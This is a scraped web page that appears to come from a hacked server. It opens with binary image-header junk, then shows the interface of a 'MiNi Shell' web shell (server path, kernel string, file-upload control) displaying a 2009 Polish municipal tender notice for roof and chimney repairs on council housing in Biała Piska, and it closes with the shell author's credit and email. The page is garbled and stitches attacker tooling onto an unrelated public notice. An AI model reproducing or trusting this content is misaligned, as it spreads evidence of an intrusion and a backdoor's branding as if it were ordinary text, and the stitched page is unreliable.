JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/110878-N-2009.html

<p class="kh_header"><b>Biała Piska: Remont gminnych budynków mieszkalnych.

Zadanie pierwsze: Biała Piska przy ul. Mickiewicza 6, 20, 24, przy 
ul.  Sienkiewicza 7, przy ul. Żeromskiego 4.                                                                                          
 
Zadanie drugie:  Biała Piska przy ul. Moniuszki 5, 6, 8, 12.</b><br>
<b>Numer ogłoszenia: 110878 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biała Piska , Plac Adama Mickiewicza 25, 12-230 Biała Piska, woj. warmińsko-mazurskie, tel. 0-87 4241350, 4241363, faks 0-87 4241351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.bialapiska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont gminnych budynków mieszkalnych.

Zadanie pierwsze: Biała Piska przy ul. Mickiewicza 6, 20, 24, przy 
ul.  Sienkiewicza 7, przy ul. Żeromskiego 4.                                                                                          
 
Zadanie drugie:  Biała Piska przy ul. Moniuszki 5, 6, 8, 12..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest remont gminnych budynków mieszkalnych 
Przedmiot zamówienia podzielony jest na 2 zadania:
Zadanie pierwsze - remont gminnych budynków mieszkalnych zlokalizowanych w Białej Piskiej przy ul.Mickiewicza 6, 20, 24, przy ul. Sienkiewicza 7, przy 
ul. Żeromskiego 4.
Zakres prac obejmuje:
a. Remont dachu polegający na wymianie istniejącego pokrycia dachowego na pokrycie z dachówki ceramicznej. 
b. Przemurowanie kominów od wierzchu kominów do poziomu połaci dachowej, uzupełnienie czapki betonowej, otynkowanie i pomalowanie. 
c. Modernizację instalacji elektrycznej przedlicznikowej.
d. Wymianę orynnowania.
Zadanie drugie - remont gminnych wielorodzinnych, budynków mieszkalnych zlokalizowanych w  Białej Piskiej przy ulicy Moniuszki 5, 6, 8, 12.
Zakres prac obejmuje:
a. Remont dachu polegający na wymianie istniejacego pokrycia dachowego na pokrycie z dachówki ceramicznej.
b. Przemurowanie kominów od wierzchu kominów do poziomu połaci dachowej, wykonanie czapki betonowej, otynkowanie i pomalowanie.
c. Modernizację instalacji elektrycznej przedlicznikowej.
d. Wymianę orynnowania.
2. Szczegółowy opis przedmiotu zamówienia stanowią: dokumentacja projektowa, kosztorysy ofertowe (ślepe) wraz z przedmiarami robót oraz specyfikacje techniczne wykonania i odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.13.20-3, 45.31.12.00-2, 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2. posiadają niezbędną wiedzę i dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
3. posiadają doświadczenie - w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali prace odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. Wymagane minimum: łączna wartość wykonanych robót min. 250.000 zł. 
4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający wymaga, aby Wykonawca wykazał, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  
5.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (zgodnie z art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, których oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych i spełniają wymagania określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia.
1. Formularz ofertowy - wypełniony i podpisany przez  Wykonawcę. Formularz ofertowy może być złożony na jedno zadanie lub na dwa. (Załącznik nr 1 do SIWZ) 
(W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców 
o udzielenie zamówienia, dokument należy złożyć wspólnie).
2. Formularz cenowy (załącznik 2a, 2b do SIWZ) wypełniony i podpisany przez Wykonawcę (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców                     
o udzielenie zamówienia, dokument należy złożyć wspólnie).
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do   ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.
4. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wskazanie kierownika robót z uprawnieniami budowlanymi zgodnie z obowiązującymi przepisami Prawa budowlanego z 7 lipca 1994 r. (Dz. U. z 2006 r. Nr 156 poz. 1118) oraz wymogami określonymi w § 3 ust.3 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. (Dz.U. z 2004r. nr 150 poz. 1579)  (Załącznik nr 5 do SIWZ). 
5. Wykaz wykonanych robót w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali prace odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu (zakresu), inwestora, dat wykonania oraz załączenia dokumentów potwierdzających, że te roboty zostały wykonane należycie. Wymagane minimum: łączna wartość wykonanych  robót min. 250.000 zł. (Załącznik nr 4 do SiWZ) 
(W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny oraz doświadczenie).
6. Dokumenty stwierdzające, że osoby o których mowa w ppkt. 6.4, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz aktualny dokument stwierdzający przynależność do właściwej izby samorządu zawodowego.
7. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 oraz 
art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (Załącznik nr 3 do SIWZ).
8. Polisa ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu  o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
10. Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87 poz. 605). Dokumenty sporządzone  w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
11. Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - wymagane jeśli Wykonawca wykona przedmiot zamówienia przy pomocy innych podmiotów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.bialapiska.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białej Piskiej, Plac Adama Mickiewicza 25, 12-230 Biała Piska, w pokoju nr 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 11:10, miejsce: Urząd Miejski w Białej Piskiej, Plac Adama Mickiewicza 25, 12-230 Biała Piska, w pokoju nr 12.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont  gminnych budynków mieszkalnych. 
Zadanie pierwsze: Biała Piska przy ul. Mickiewicza 6, 20, 24, przy ul.  Sienkiewicza 7, przy ul. Żeromskiego 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie pierwsze - remont gminnych budynków mieszkalnych zlokalizowanych  w Białej Piskiej przy ul.Mickiewicza 6, 20, 24, przy ul. Sienkiewicza 7, przy 
ul. Żeromskiego 4.
Zakres prac obejmuje:
a. Remont dachu polegający na wymianie istniejącego pokrycia dachowego na pokrycie z dachówki ceramicznej. 
b. Przemurowanie kominów od wierzchu kominów do poziomu połaci dachowej, uzupełnienie czapki betonowej, otynkowanie i pomalowanie. 
c. Modernizację instalacji elektrycznej przedlicznikowej.
d. Wymianę orynnowania.
Szczegółowy opis przedmiotu zamówienia stanowią: dokumentacja projektowa,     kosztorysy ofertowe (ślepe) wraz z przedmiarami robót oraz specyfikacje techniczne wykonania i odbioru robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.13.20-3, 45.31.12.00-2, 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont gminnych budynków mieszkalnych.                
Zadanie drugie:  Biała Piska przy ul. Moniuszki 5, 6, 8, 12..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie drugie - remont gminnych wielorodzinnych, budynków mieszkalnych zlokalizowanych w  Białej Piskiej przy ulicy Moniuszki 5, 6, 8, 12.
Zakres prac obejmuje:
a. Remont dachu polegający na wymianie istniejacego pokrycia dachowego na pokrycie z dachówki ceramicznej.
b. Przemurowanie kominów od wierzchu kominów do poziomu połaci dachowej, wykonanie czapki betonowej, otynkowanie i pomalowanie.
c. Modernizację instalacji elektrycznej przedlicznikowej.
d. Wymianę orynnowania.

Szczegółowy opis przedmiotu zamówienia stanowią: dokumentacja projektowa,      kosztorysy ofertowe (ślepe) wraz z przedmiarami robót oraz specyfikacje techniczne wykonania i odbioru robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.13.20-3, 45.31.12.00-2, 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com